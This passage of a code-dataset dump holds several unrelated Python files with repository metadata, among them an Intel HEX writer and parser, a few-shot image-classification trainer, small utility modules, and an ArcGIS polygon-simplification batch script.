enumerate(blocks_64K):\n offset_64K = (block_start - block_start % _64K) / _64K\n\n if use_segment_addressing:\n assert offset_64K < 16\n usba = offset_64K << 12\n output.append(self._make_segment_address_line(usba))\n else:\n ulba = offset_64K\n output.append(self._make_linear_address_line(ulba))\n\n # Block length:\n # All blocks are size _64K, except maybe the first\n # and the last.\n # The first takes up the length needed to complete\n # its offset to the first 64K boundary.\n # The last is computed as follows:\n # The total data length is taken, and the start\n # of the block is subtracted. This still doesn't\n # give the final answer, becase the data began\n # at an offset, which is reflected in the start\n # of the first block.\n #\n if i == 0:\n block_len = _64K - block_start % _64K\n elif i == len(blocks_64K) - 1:\n block_len = len(rec_data) - block_start + blocks_64K[0]\n else:\n block_len = _64K\n\n #~ print ' block:', block_start, block_len, ulba\n\n output += self._block_data_lines(\n block_start % _64K,\n rec_data[data_ptr : data_ptr + block_len],\n bytes_per_data_line)\n\n data_ptr += block_len\n\n if write_start_address:\n if use_segment_addressing:\n output.append(self._make_segment_start_address_line())\n else:\n output.append(self._make_linear_start_address_line())\n\n output.append(self._make_endfile_line())\n str = '\\n'.join(output) + '\\n'\n\n if filename:\n file = open(filename, 'w')\n file.write(str)\n file.close()\n else:\n return str\n\n def _block_data_lines(self, offset, data, bytes_per_line):\n # Splits a block of data that begins at some offset into\n # Intel HEX record lines, and returns the list of lines.\n #\n lines = []\n data_ptr = 0\n #~ print \"bdl:\", offset, len(data)\n\n # Advance bytes_per_line at at time.\n # offset: the load offset field of the line\n # data_ptr: pointer into the data from which the next\n # line will be taken\n #\n while data_ptr < len(data):\n if data_ptr + bytes_per_line > len(data):\n num_bytes_in_line = len(data) - data_ptr\n else:\n num_bytes_in_line = bytes_per_line\n\n lines.append(self._make_data_line(\n offset,\n data[data_ptr:data_ptr + num_bytes_in_line]))\n\n offset += num_bytes_in_line\n data_ptr += num_bytes_in_line\n\n return lines\n\n def _make_checksum(self, line):\n chksum = 0\n for c in line:\n chksum = (chksum + ord(c)) % 256\n return chr((256 - chksum) % 256)\n\n def _format_line(self, data):\n \"\"\" Given the data for a line, computes its checksum,\n prepends ':' and hexlifies all the data bytes to\n produce a valid line of Intel HEX file.\n \"\"\"\n data_with_checksum = data + self._make_checksum(data)\n return (':' + hexlify(data_with_checksum).upper())\n\n def _make_linear_address_line(self, ulba):\n line = '\\x02\\x00\\x00\\x04' + pack('>H', ulba)\n return self._format_line(line)\n\n def _make_segment_address_line(self, usba):\n line = '\\x02\\x00\\x00\\x02' + pack('>H', usba)\n return self._format_line(line)\n\n def _make_data_line(self, offset, data):\n line = chr(len(data)) + pack('>H', offset) + '\\x00' + data\n return self._format_line(line)\n\n def _make_segment_start_address_line(self):\n cs = (self.data.start_address / _64K) << 12\n ip = (self.data.start_address % _64K)\n line = '\\x04\\x00\\x00\\x03' + pack('>HH', cs, ip)\n return self._format_line(line)\n\n def _make_linear_start_address_line(self):\n line = '\\x04\\x00\\x00\\x05' + pack('>L', self.data.start_address)\n return self._format_line(line)\n\n def _make_endfile_line(self):\n return ':00000001FF'\n\n\n ######################-- PRIVATE --######################\n\n class _LineError(Exception): pass\n\n def _parse_line(self, line):\n \"\"\" Parses a line from an Intel Hex file. The line is as\n read from the file.\n Recognizes the line type, makes sure it's formatted\n correctly, and checks the checksum.\n\n If the line is valid, returns the tuple:\n type, offset, data\n\n type: a _LineType value\n offset: value of the offset field (integer)\n data: a binary string with the line's data\n\n If the line is invalid, throws _LineError with an\n explanatory message.\n \"\"\"\n # the absolute minimal length of a valid line is 11\n # (1 for ':', 2 for record length, 4 for offset, 2 for\n # type, 0 for data and 2 for checksum)\n #\n if len(line) < 11:\n raise self._LineError('line too short')\n\n if line[0] != \":\":\n raise self._LineError(\"line does not begin with ':'\")\n\n try:\n length = int(line[1:3], 16)\n offset = int(line[3:7], 16)\n type = int(line[7:9], 16)\n checksum = int(line[-2:], 16)\n except (TypeError, ValueError):\n err = sys.exc_info()[1]\n raise self._LineError(err.message)\n\n try:\n data = unhexlify(line[9:-2])\n except TypeError:\n err = sys.exc_info()[1]\n raise self._LineError('bad data field: %s' % err.message)\n\n if len(data) != length:\n raise self._LineError('data field length (%s) not as specified (%s)' % (\n len(data), length))\n\n # validate checksum\n checksum_test = (length + offset % 256 + offset // 256 + type + checksum) % 256\n for byte in data:\n checksum_test = (checksum_test + ord(byte)) % 256\n\n if checksum_test != 0:\n expected = (checksum - checksum_test) % 256\n raise self._LineError('checksum test fails: expected %X' % expected)\n\n rectypes = {\n 0: 'Data',\n 1: 'EndFile',\n 2: 'SegmentOffset',\n 3: 'SegmentStartAddr',\n 4: 'LinearOffset',\n 5: 'LinearStartAddr'}\n\n if not rectypes.has_key(type):\n raise self._LineError('unknown record type: %s' % line[7:9])\n\n return rectypes[type], offset, data\n\n\ndef _datastore2string(data, padbyte=None, padtosize=None):\n \"\"\" A helper function for packing the whole data store into\n a string.\n\n See DataFormatterBinary.write() for the explanation of\n parameters.\n \"\"\"\n str = ''\n\n if data.num_records() == 0:\n return str\n\n # If the first record doesn't begin at 0, maybe we should\n # pad the data from 0\n #\n first_record_start = data.record(0)[0]\n if first_record_start != 0 and padbyte:\n str += padbyte * first_record_start\n\n # Add all the records to the string. First pad them, if\n # necessary.\n #\n # prev_record_end is initialized to first_record_start - 1\n # to cleanly handle the first record without extra checks.\n #\n prev_record_end = first_record_start - 1\n for rec_start, rec_data in data.records():\n if prev_record_end + 1 != rec_start and padbyte:\n str += padbyte * (rec_start - prev_record_end - 1)\n\n str += rec_data\n prev_record_end = rec_start + len(rec_data) - 1\n\n # Pad until padtosize if requested\n #\n if padbyte and padtosize and padtosize > prev_record_end + 1:\n str += padbyte * (padtosize - prev_record_end - 1)\n\n return str\n\n\nclass _DataRecords(object):\n \"\"\" Implements a collection of 'records'. Each record holds\n a consecutive segment of data.\n\n Serves as the low-level implementation of the high-level\n interface exposed in BinaryAppDataStore.\n \"\"\"\n def clear(self):\n self.d = []\n self.len = 0\n\n def __init__(self):\n self.clear()\n\n def __len__(self):\n return self.len\n\n def __getitem__(self, addr):\n \"\"\" Access to the byte at address 'addr'\n \"\"\"\n (recnum, offset) = self._find_address(addr)\n return self.d[recnum].data[offset]\n\n def record(self, i):\n \"\"\" The i-th record (start, data) tuple\n \"\"\"\n r = self.d[i]\n return (r.start, r.data)\n\n def num_records(self):\n \"\"\" Number of records\n \"\"\"\n return len(self.d)\n\n def records(self):\n \"\"\" An iterator of records\n \"\"\"\n for r in self.d:\n yield (r.start, r.data)\n\n def add_record(self, address, data, merge=False):\n def find_index(lo, hi):\n \"\"\" Finds the position to insert the record in, using\n binary search.\n Doesn't check record clashes.\n \"\"\"\n i = (hi + lo) // 2\n #~ print 'fi:', i\n\n if self.d[i].start > address:\n return 0 if i == 0 else find_index(lo, i)\n elif i == len(self.d) - 1:\n return i + 1\n elif self.d[i + 1].start > address:\n return i + 1\n else:\n return find_index(i, hi)\n\n def segments_intersect(s1, e1, s2, e2):\n \"\"\" Do the segments [s1:e1] and [s2:e2] intersect ?\n Note: the segment ranges are inclusive, and all\n end-points are natural. Also, eN >= sN always.\n \"\"\"\n return e1 >= s2 and e2 >= s1\n\n # If we're empty, no need to search\n #\n if len(self.d) == 0:\n self.d = [self._make_record_addr_data(address, data)]\n # Otherwise find the index to insert the record in\n #\n else:\n i = find_index(0, len(self.d))\n\n rec_start = address\n rec_end = address + len(data) - 1\n\n # Check that the new record doesn't clash with its\n # neighbors\n #\n if i > 0 and segments_intersect(\n rec_start, rec_end,\n self.d[i - 1].start, self.d[i - 1].end):\n msg = \"Added record clashes with existing record at %s:%s\" % (\n self.d[i - 1].start, self.d[i - 1].end)\n raise RecordClashError(msg)\n if i < len(self.d) and segments_intersect(\n rec_start, rec_end,\n self.d[i].start, self.d[i].end):\n msg = \"Added record clashes with existing record at %s:%s\" % (\n self.d[i].start, self.d[i].end)\n raise RecordClashError(msg)\n\n merged_left = False\n merged_right = False\n\n # If merging is requested, attempt to merge with\n # neighbor records\n #\n if merge:\n # to the left...\n if i > 0 and self.d[i - 1].end == rec_start - 1:\n self.d[i - 1].end = rec_end\n self.d[i - 1].data += data\n merged_left = True\n # to the right\n elif ( i < len(self.d) and\n rec_end == self.d[i].start - 1):\n self.d[i].start = rec_start\n self.d[i].data = data + self.d[i].data\n merged_right = True\n\n # and now, maybe we can merge'em all !\n if ( 0 < i < len(self.d) and\n self.d[i - 1].end == self.d[i].start - 1):\n self.d[i - 1].end = self.d[i].end\n self.d[i - 1].data += self.d[i].data\n del self.d[i]\n\n if not merge or not (merged_left or merged_right):\n # Insert the new record into its place\n #\n self.d.insert(i,\n self._Record(rec_start, rec_end, data))\n\n self.len += len(data)\n\n ######################-- PRIVATE --######################\n\n # Holds a consecutive 'record' of data. It has a start\n # address, an end address and the data string.\n # len(data) == end - start + 1\n #\n class _Record(object):\n def __init__(self, start, end, data):\n if end < start or len(data) != end - start + 1:\n msg = 'data len: %s, start: %s, end: %s' % (\n len(data), start, end)\n raise InvalidRecordError(msg)\n\n self.start = start\n self.end = end\n self.data = data\n\n def __repr__(self):\n return \"[%s:%s] '%s'\" % (self.start, self.end, self.data)\n\n def _make_record_addr_data(self, address, data):\n return self._Record(address, address + len(data) - 1, data)\n\n def _find_address(self, addr):\n \"\"\" Finds a data cell with the given address. Returns\n a pair (recnum, offset):\n recnum: record number\n offset: offset to the requested address\n The data can then be accessed as\n self.d[recnum].data[offset]\n\n If such an address doesn't exist in any record,\n returns None.\n \"\"\"\n\n # binary search between lo and hi, inclusive\n def search(lo, hi):\n if lo > hi:\n raise IndexError('No address %s in records' % addr)\n\n i = (hi + lo) // 2\n\n if self.d[i].start > addr:\n return search(lo, i - 1)\n else:\n if self.d[i].end >= addr:\n return (i, addr - self.d[i].start)\n else:\n return search(i + 1, hi)\n\n return search(0, len(self.d) - 1)\n\n\ndef split_subsequences(iterable, length=2, overlap=0,\n join_substr=True):\n \"\"\" Given an iterable, splits it to subsequences of the given\n length (possibly with overlapping), and returns an\n iterator of the subsequences.\n\n If join_substr is set to True and iterable is a string,\n the subsqeuences will be joined (with '') into substrings.\n \"\"\"\n isstring = isinstance(iterable, str) and join_substr\n it = iter(iterable)\n results = list(itertools.islice(it, length))\n while len(results) == length:\n yield ''.join(results) if isstring else results\n results = results[length - overlap:]\n results.extend(itertools.islice(it, length - overlap))\n if results:\n yield ''.join(results) if isstring else results\n\n\ndef string2hexpairs(str):\n \"\"\" Given a string denoting binary data, splits it to a list\n of 'hexpairs', such as ['A8', 'FF']\n \"\"\"\n return list(split_subsequences(binascii.hexlify(str), 2))\n","repo_name":"eliben/luz-cpu","sub_path":"luz_asm_sim/lib/commonlib/binaryappdata.py","file_name":"binaryappdata.py","file_ext":"py","file_size_in_byte":32429,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"54"} +{"seq_id":"36807785180","text":"\nUP = 'KEY_UP'\nDOWN = 'KEY_DOWN'\nLEFT = 'KEY_LEFT'\nRIGHT = 'KEY_RIGHT'\nBACKSPACE = ['KEY_BACKSPACE', '\\b', '\\x7f']\nDELETE = 'DC'\nESC = chr(27)\n\nENTER = ['KEY_ENTER', '\\n']\nVERTICAL_ARROWS = [UP, DOWN]\nHORIZONTAL_ARROWS = [LEFT, RIGHT]\nARROWS = VERTICAL_ARROWS + HORIZONTAL_ARROWS\n\nINPUT_IGNORE = ENTER + VERTICAL_ARROWS + [ESC]\n","repo_name":"eduardoHoefel/dear-tool","sub_path":"gui/objects/keys.py","file_name":"keys.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8300867952","text":"\"\"\"\nClass for multi-tasking.\n\"\"\"\nfrom typing import List\n\nimport jax.numpy as np\n\nfrom swarmrl.models.interaction_model import Colloid\nfrom swarmrl.tasks.task import Task\n\n\nclass MultiTasking(Task):\n \"\"\"\n Class for handling multiple tasks.\n \"\"\"\n\n def __init__(self, particle_type: int = 0, tasks: List[Task] = []):\n \"\"\"\n Constructor for multi-tasking.\n \"\"\"\n super().__init__(particle_type)\n self.tasks = tasks\n\n def initialize(self, colloids: List[Colloid]):\n \"\"\"\n Initialize the observables as needed.\n\n Parameters\n ----------\n colloids : List[Colloid]\n List of colloids with which to initialize the observable.\n\n Returns\n -------\n Some of the observables passed to the constructor might need to be\n initialized with the positions of the colloids. This method does\n that.\n \"\"\"\n for item in self.tasks:\n item.initialize(colloids)\n\n def __call__(self, colloids: List[Colloid]) -> np.ndarray:\n \"\"\"\n Computes all observables and returns them in a concatenated list.\n\n Parameters\n ----------\n colloids : list of all colloids.\n\n Returns\n -------\n rewards : np.ndarray of shape (num_colloids, )\n Array of rewards for each colloid.\n \"\"\"\n species_indices = self.get_colloid_indices(colloids)\n rewards = np.zeros(len(species_indices))\n for task in self.tasks:\n ts = task(colloids)\n rewards += ts\n\n return rewards\n","repo_name":"SwarmRL/SwarmRL","sub_path":"swarmrl/tasks/multi_tasking.py","file_name":"multi_tasking.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"54"} +{"seq_id":"17101208268","text":"from playerreader import PlayerReader\n\nclass PlayerStats:\n def __init__(self, reader: PlayerReader):\n self.reader = reader\n\n def top_scorers_by_nationality(self, nationality: str):\n players = self.reader.get_players()\n return_list = []\n\n for player in players:\n if player.nationality == nationality:\n return_list.append(player)\n \n return_list.sort(reverse=True)\n return return_list","repo_name":"nikolaipaukkonen/palautusrepositorio","sub_path":"viikko3/nhl-reader/src/playerstats.py","file_name":"playerstats.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14804096286","text":"from tensorboardX import SummaryWriter\nimport time\nimport os\nimport numpy as np\nimport torch\nfrom torch.utils.data import DataLoader, sampler\nimport torch.nn.functional as F\nfrom utils import *\nfrom model import Model\nfrom datasets import get_transform, get_dataset,dset_from_json\nimport torch.backends.cudnn as cudnn\n\nclass Trainer():\n def __init__(self, opt, dset=None):\n logdir = opt.logdir\n ###\n try:\n import submitit\n job_env = submitit.JobEnvironment()\n logdir = logdir.replace('%j', str(job_env.job_id))\n opt.logdir = logdir\n except:\n print('No job id found')\n ###\n if opt.ngpus > 1:\n opt.bSz = opt.bSz*opt.ngpus\n opt.n_workers = int(min(opt.n_workers*opt.ngpus, 20))\n self.opt = opt\n print(f'Training with opts: {opt}')\n \n self.writer = SummaryWriter(logdir)\n print(f'Log dir: {self.writer.log_dir}')\n self.writer.add_text('opts', str(opt), 0)\n \n # Fix seed\n if opt.seed: torch.manual_seed(opt.seed)\n \n # depending on the chosen architecture adapt training image size\n if '224' in opt.feat_arch:\n opt.iSz = 224\n print(f'Using iSz: {opt.iSz}')\n else:\n print(f'Continuing with iSz: {opt.iSz}')\n \n # construct train dataset or use provided one\n if dset is None:\n self.traindset = get_dataset(opt.dataset, classDset=True, iSz=opt.iSz)\n else:\n self.traindset = dset\n \n print(self.traindset)\n print(self.traindset.classes[0].samples[0])\n print('Train dataset class length histogram')\n print(np.histogram([len(c) for c in self.traindset.classes]))\n self.ttype = 'IN' if opt.benchmark == 'IN' else 'miniIN'\n self.traindset.transform = get_transform(self.ttype, phase='train', do_normalize=True, iSz=opt.iSz)\n print('Train transform: ', self.traindset.transform)\n # construct dataloader\n self.init_dataloader(self.traindset)\n\n # construct validation/test dataset\n self.get_val_test_sets()\n print('val dataset: ', self.valdset)\n print('test dataset: ', self.testdset)\n \n # verify image size\n assert opt.iSz in [224, 84], f' Got iSz: {opt.iSz}'\n \n # construct model\n self.model = Model(feat_arch=opt.feat_arch, nClasses=len(self.traindset.classes))\n if opt.ngpus > 1:\n self.model = torch.nn.DataParallel(self.model, device_ids=range(opt.ngpus))\n print('Using ')\n self.model.cuda()\n print(self.model)\n \n if opt.steps is None:\n opt.steps = get_steps(len(self.traindset), bSz=opt.bSz)\n print(f'Using steps: {opt.steps}')\n opt.max_iter = opt.steps[-1]\n \n # setup optimizer and scheduler\n self.optimizer = torch.optim.SGD(self.model.parameters(), lr=opt.lr, momentum=opt.momentum, weight_decay=opt.wd, nesterov=opt.nesterov)\n self.scheduler = MultiStepWarmupLR(self.optimizer, milestones=opt.steps, gamma=opt.gamma, warmup_steps=opt.warmup_steps)\n \n self.iteration = 0\n \n self.ims = torch.FloatTensor().cuda()\n self.targets = torch.LongTensor().cuda()\n self.best_5shot = 0\n self.best_ckpt_file = os.path.join(self.writer.log_dir,'best_checkpoint.pth')\n \n cudnn.benchmark = True\n print(f'Dataset size: {len(self.traindset)}, bSz: {opt.bSz}, steps: {opt.steps}, len dataloader {len(self.trainloader)}')\n \n\n def train(self):\n if self.opt.train_type == 'CC':\n return self.train_CosineClassifier()\n else:\n raise NotImplementedError(f'Unknown training type {self.opt.train_type}')\n\n def train_CosineClassifier(self):\n print('Start training CC !')\n while self.iteration < self.opt.max_iter:\n startTime = time.time()\n for i, (ims, targets) in enumerate(self.trainloader):\n self.ims.resize_(ims.size()).copy_(ims)\n self.targets.resize_(targets.size()).copy_(targets)\n\n self.model.train()\n self.optimizer.zero_grad()\n \n outputs = self.model(self.ims)\n \n loss = F.cross_entropy(outputs, self.targets)\n loss.backward()\n \n self.optimizer.step()\n self.scheduler.step()\n lr = self.scheduler.get_lr()[0]\n\n if self.iteration % 50 == 0:\n print(f'Iteration {self.iteration}: loss {loss:.3f}')\n self.writer.add_scalar('Train_CC/lr', lr, self.iteration)\n self.writer.add_scalar('Train_CC/loss', loss, self.iteration)\n _, y_hat = outputs.max(1)\n acc_val = torch.eq(y_hat, self.targets.squeeze()).float().mean()\n self.writer.add_scalar('Train_CC/acc', acc_val, self.iteration)\n \n del loss, outputs # clean a bit\n \n if self.iteration %self.opt.eval_freq == 0:\n # eval and plot\n ret = self.eval_fewshot(self.valdset.sample_N_images(50000))# sample max validation images for a dataset\n self.writer.add_scalar('Val_CC/1-shot', ret[1][0], self.iteration)\n self.writer.add_scalar('Val_CC/5-shot', ret[5][0], self.iteration)\n # if best checkpoint save it\n if ret[5][0] > self.best_5shot:\n self.best_5shot = ret[5][0]\n state_dict = self.model.state_dict() if self.opt.ngpus == 1 else self.model.module.state_dict()\n obj = {\n 'model':state_dict,\n 'iteration':self.iteration,\n 'best_5shot': self.best_5shot,\n 'opt':self.opt,\n }\n print(f'Saving best model at iteration: {self.iteration}, {self.best_5shot}')\n torch.save(obj, self.best_ckpt_file)\n torch.save(ret, os.path.join(self.writer.log_dir, 'bestval_result.pth'))\n \n self.iteration += 1\n if self.iteration >= self.opt.max_iter:\n break\n epochTime = time.time()- startTime\n eta = epochTime*(self.opt.max_iter-self.iteration)/len(self.trainloader)\n print(f'ETA: {eta/3600:0.0f}h {(eta%3600)/60:0.0f}min')\n # eval and save\n # load best checkpoint\n print('Loading best model')\n x = torch.load(self.best_ckpt_file)\n if self.opt.ngpus == 1:\n self.model.load_state_dict(x['model'])\n else:\n self.model.module.load_state_dict(x['model'])\n \n ret = self.eval_fewshot(self.testdset, nEpisodes=self.opt.nEpisodes, test=True) # TODO\n torch.save(ret, os.path.join(self.writer.log_dir,'result.pth'))\n if self.opt.delete_ckpt:\n os.remove(self.best_ckpt_file)\n self.writer.add_scalar('Test_CC/1-shot', ret[1][0], self.iteration)\n self.writer.add_scalar('Test_CC/5-shot', ret[5][0], self.iteration)\n return ret\n \n def eval_fewshot(self, whole_test_set, kshots=[1,5], seed_episode=True, usemean=True, nEpisodes=1000, test=False):\n torch.cuda.empty_cache()\n start_time = time.time()\n classifier_arch = 'cosine'\n # precompute features of the whole set\n self.model.eval()\n model = self.model if self.opt.ngpus == 1 else self.model.module\n \n # eval few-shot\n results = {}\n ret = {}\n for k in kshots:\n results[k] = []\n maxk = max(kshots)\n nNovel = self.nNovel; nTest = self.nTest; topk = self.topk\n \n set_json = self.opt.test_json if test else self.opt.val_json\n if set_json:\n if set_json == 'miniIN1k_nim100_seed0_closest':\n classDict = torch.load('data/test_benchmarks/miniIN1k_4_closest_inds_of_each.pth')\n print('Closest class benchmark')\n elif set_json == 'miniIN1k_nim100_seed0_farthest':\n classDict = torch.load('data/test_benchmarks/miniIN1k_4_farthest_inds_of_each.pth')\n print('Farthest class benchmark')\n elif set_json == 'miniIN1k_nim100_seed0':\n classDict = {}\n print('Random class benchmark')\n elif 'diverse' in set_json:\n print('Using most diverse classes')\n if set_json == 'miniIN1k_most_diverse':\n classInds = torch.load('data/test_benchmarks/100_high_diversity_inds.pth')\n elif set_json == 'miniIN1k_least_diverse':\n classInds = torch.load('data/test_benchmarks/100_low_diversity_inds.pth')\n whole_test_set = whole_test_set.sample_n_classes(class_inds=classInds)\n print('Sub-sampled dataset ', whole_test_set)\n print(f'Precomputing features of whole set with: {len(whole_test_set)} images, test: {str(test)}')\n testloader = DataLoader(whole_test_set, batch_size=self.opt.bSz, shuffle=False, num_workers=20)\n features, targets = compute_features(model.feat, testloader, verbose=False)\n print('Done. Got features of size: {}'.format(features.size()))\n\n for episode in range(nEpisodes):\n seed = episode if seed_episode else None\n g = get_generator(seed)\n N = len(whole_test_set)\n if set_json and 'miniIN1k_nim100_seed0' in set_json:\n if len(classDict):\n c0ind = torch.randperm(1000)[0].item()\n class_inds = torch.LongTensor([c0ind]+classDict[c0ind])\n else:\n class_inds = torch.randperm(1000)[:5]\n else:\n non_empty_class_inds = [i for i,c in enumerate(whole_test_set.classes) if len(c)]\n \n class_inds = torch.randperm(len(non_empty_class_inds), generator=g)[:nNovel]\n class_inds = torch.LongTensor(non_empty_class_inds)[class_inds]\n \n global_inds = []\n for class_ind in class_inds:\n class_size = len(whole_test_set.classes[class_ind])\n sampled_inds = (torch.randperm(class_size, generator=g)[:maxk+nTest]).tolist()\n global_inds.extend([whole_test_set.cum_len[class_ind] + ind for ind in sampled_inds])\n global_inds = torch.LongTensor(global_inds).view(nNovel, maxk+nTest)\n targets = torch.LongTensor(range(nNovel)).repeat(maxk+nTest,1).transpose(0,1)\n\n exemplar_inds = global_inds[:,:maxk].contiguous().view(-1)\n test_inds = global_inds[:,maxk:].contiguous().view(-1)\n\n trainfeatures_maxk, traintargets_maxk = features[exemplar_inds], targets[:,:maxk].contiguous().view(-1)\n testfeatures, testtargets = features[test_inds], targets[:,maxk:].contiguous().view(-1)\n\n for k in kshots:\n inds = torch.cat([torch.where(traintargets_maxk==i)[0][0:k] for i in range(nNovel)])\n trainfeatures = trainfeatures_maxk[inds]\n traintargets = traintargets_maxk[inds]\n\n if classifier_arch == 'cosine':\n testfeatures = testfeatures.cuda()\n trainfeatures = trainfeatures.cuda()\n traintargets = traintargets.cuda()\n\n # Cosine Similarity with average feature\n cls_score = model.fc(testfeatures, features_train=trainfeatures, labels_train=traintargets)\n\n # eval on val_noveldset by computing NN to features in train_noveldset\n accs = accuracy(cls_score.cpu(), torch.LongTensor(testtargets), topk=(topk,))\n else:\n x = F.normalize(testfeatures, p=2, dim=testfeatures.dim()-1)# len(val_noveldset)-->bSz,fSz\n y = F.normalize(trainfeatures, p=2, dim=trainfeatures.dim()-1)# len(train_noveldset)-->nclasses*nExemplar_per_class, fSz\n dist = torch.mm(x,y.t()) # size: len(val_noveldset)-->bSz, allExemplars\n vals, inds = traintargets.sort()\n dist = dist[:,inds].view(dist.size(0),nNovel, k)\n if usemean:\n dist = dist.mean(2)\n else:\n dist = dist.min(2)[0]# take min distance over nExemplars of each class\n # eval on val_noveldset by computing NN to features in train_noveldset\n accs = accuracy(dist, torch.LongTensor(testtargets), topk=(topk,))\n results[k].append(accs)\n ret[k] = get_mean_ci(np.array(results[k])[:,0])\n \n if test:\n self.writer.add_scalar('Test_CC/1-shot', ret[1][0], episode)\n self.writer.add_scalar('Test_CC/5-shot', ret[5][0], episode)\n if episode % 1000 == 0:\n print('----------')\n print(f'Episode: {episode}/{nEpisodes}')\n for k in kshots:\n print(' {}-shot top-{} acc: {:0.2f}±{:0.2f}'.format(k, topk, *ret[k]))\n print('----------')\n print('Final')\n print('----------')\n for k in kshots:\n print(' {}-shot top-{} acc: {:0.2f}±{:0.2f}'.format(k, topk, *ret[k]))\n print('----------')\n s = time.time()-start_time\n print(f'Took: {s:0.2f}s')\n return ret\n \n def init_dataloader(self, dset):\n class_sample_count = [len(c) for c in dset.classes]\n weights = 1 / torch.Tensor(class_sample_count)\n weights[~((weights + 1) != weights)]= 0\n weight_per_sample = [0]*len(dset)\n for i in range(len(dset)):\n c, cind = dset.index_to_sample_d[i]\n weight_per_sample[i] = weights[c]\n self.trainsampler = sampler.WeightedRandomSampler(weight_per_sample, len(dset))\n self.trainloader = DataLoader(dset, batch_size=self.opt.bSz, pin_memory=True, num_workers=self.opt.n_workers, sampler=self.trainsampler, drop_last=True)\n \n def get_val_test_sets(self):\n if self.opt.benchmark in ['miniIN','cub', 'tieredIN','flower'] or 'miniIN1k' in self.opt.benchmark:\n if 'miniIN1k' in self.opt.benchmark:\n self.valdset = get_dataset('miniIN', split='val', iSz=self.opt.iSz)\n else:\n self.valdset = get_dataset(self.opt.benchmark, split='val', iSz=self.opt.iSz)\n \n if self.opt.test_json:\n self.testdset = dset_from_json('data/test_benchmarks/miniIN1k_nim100_seed0.json')\n else:\n self.testdset = get_dataset(self.opt.benchmark, split='test', iSz=self.opt.iSz)\n self.nNovel = 5\n self.nTest = 15 # per class\n self.topk = 1\n elif self.opt.benchmark == 'IN':\n self.valdset = get_dataset(self.opt.benchmark, split='val')\n self.testdset = get_dataset(self.opt.benchmark, split='test')\n self.nNovel = 250\n self.nTest = 6 # per class\n self.topk = 5\n else:\n raise NotImplementedError('Need to implement eval set for IN')\n \n transform = get_transform(self.ttype, phase='test', do_normalize=True, iSz=self.opt.iSz)\n self.valdset.transform = transform\n self.testdset.transform = transform\n\n\nclass EpisodicBatchSampler(torch.utils.data.Sampler):\n def __init__(self, dset, nway=5, nsupport=1, nquery=10, seed=None):\n self.nepisodes = 1+len(dset)//(nway*(nquery+nsupport))\n self.dset = dset\n self.nway = nway\n self.nsupport = nsupport\n self.nquery = nquery\n self.seed = seed\n self.epoch = 0\n\n def __iter__(self):\n indices = []\n for i in range(self.nepisodes):\n # sample class indices\n seed_i = None if self.seed is None else self.seed+i+self.epoch\n gen = get_generator(seed_i)\n class_inds = torch.randperm(len(self.dset.classes), generator=gen)[:self.nway].tolist()\n for ind in class_inds:\n c = self.dset.classes[ind]\n cinds = torch.randperm(len(c), generator=gen)[:self.nsupport+self.nquery]\n start = self.dset.cum_len[ind]; end = self.dset.cum_len[ind+1]\n cinds = torch.LongTensor(range(start, end))[cinds]\n indices.append(cinds)\n indices = torch.cat(indices)\n return iter(indices.tolist())\n \n def __len__(self):\n return self.nepisodes","repo_name":"facebookresearch/fewshotDatasetDesign","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":16890,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"54"} +{"seq_id":"19760660632","text":"# encoding: utf-8\n# simplify polygons in batches\n\nimport arcpy\nimport datetime\n\n\n# controlling process\nif __name__ == '__main__':\n # settings\n arcpy.env.overwriteOutput = True\n\n # parameters\n folder = 'C:/GIS/EBAR/'\n input_gdb = folder + 'EBAR4.gdb/'\n input_fc = 'RangeMapInputCopy'\n output_name = 'EBAR4.gdb'\n output_gdb = folder + output_name\n min_objectid = 0\n max_objectid = 10000\n batch_size = 10000\n min_accuracy = 1\n max_accuracy = 5\n tolerance = '0.1'\n\n # create output gdb\n if not arcpy.Exists(output_gdb):\n arcpy.CreateFileGDB_management(folder, output_name)\n\n # layer to allow selections\n arcpy.MakeFeatureLayer_management(input_gdb + input_fc, 'rmi_lyr')\n current_min = min_objectid\n # batch loop\n print(datetime.datetime.now())\n while current_min < max_objectid:\n print(current_min)\n # selection for current batch\n arcpy.SelectLayerByAttribute_management('rmi_lyr', 'NEW_SELECTION',\n 'objectid >= ' + str(current_min) +\n ' AND objectid < ' + str(current_min + batch_size) +\n ' AND Accuracy >= ' + str(min_accuracy) +\n ' AND Accuracy < ' + str(max_accuracy) +\n \" AND OriginalGeometryType = 'P'\")\n # default to 10 meter accuracy (1 meter toloerance) if not provided\n if tolerance == '1 meters':\n arcpy.SelectLayerByAttribute_management('rmi_lyr', 'ADD_TO_SELECTION',\n 'objectid >= ' + str(current_min) +\n ' AND objectid < ' + str(current_min + batch_size) +\n ' AND Accuracy IS NULL'\n \" AND OriginalGeometryType = 'P'\")\n arcpy.SelectLayerByAttribute_management('rmi_lyr', 'ADD_TO_SELECTION',\n 'objectid >= ' + str(current_min) +\n ' AND objectid < ' + str(current_min + batch_size) +\n ' AND Accuracy <= 0'\n \" AND OriginalGeometryType = 'P'\")\n result = arcpy.GetCount_management('rmi_lyr')\n print(result[0])\n if int(result[0]) > 0:\n arcpy.SimplifyPolygon_cartography('rmi_lyr', output_gdb + '/' + input_fc + str(current_min), 'POINT_REMOVE',\n tolerance, collapsed_point_option='NO_KEEP', error_option='RESOLVE_ERRORS')\n print(datetime.datetime.now())\n current_min += batch_size\n\n # input = 'C:\\GIS\\EBAR\\EBAR-KBA-Dev.gdb\\RangeMapInput'\n # temp = 'C:\\GIS\\EBAR\\EBAR-KBA-Dev.gdb\\TempRangeMapInputX'\n # output = 'C:\\GIS\\EBAR\\EBAR-KBA-Dev.gdb\\TempRangeMapInput'\n # # input = 'C:/GIS/EBAR/nsc-gis-ebarkba.sde/RangeMapInput'\n # # temp = 'C:/GIS/EBAR/EBAR4.gdb/TempRangeMapInput'\n # # output = 'C:/GIS/EBAR/nsc-gis-ebarkba.sde/TestRangeMapInputY'\n # # arcpy.env.workspace = 'C:/GIS/EBAR/EBAR4.gdb'\n # 